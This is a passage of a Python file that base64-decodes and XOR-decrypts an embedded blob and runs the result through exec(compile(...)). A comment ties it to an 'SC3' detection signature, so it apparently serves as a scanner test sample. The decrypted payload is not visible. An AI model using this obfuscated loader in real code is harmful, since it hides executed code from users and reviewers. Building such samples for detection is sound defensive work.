jAyUMTL0pgQYhHi9uuVmRGS91PgLbK6w6BjJpKIJuuHUHNgpMziLkX0p3QwK5aaw6CzMAQ5V/gScFOwYKzwHUPAx3PH2IarMwNQhDH9sr/Ao1OgJLiFSBd1BdQwLGK7M0AzlLC+w="
_K = bytes.fromhex("6322e60bde556a57")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
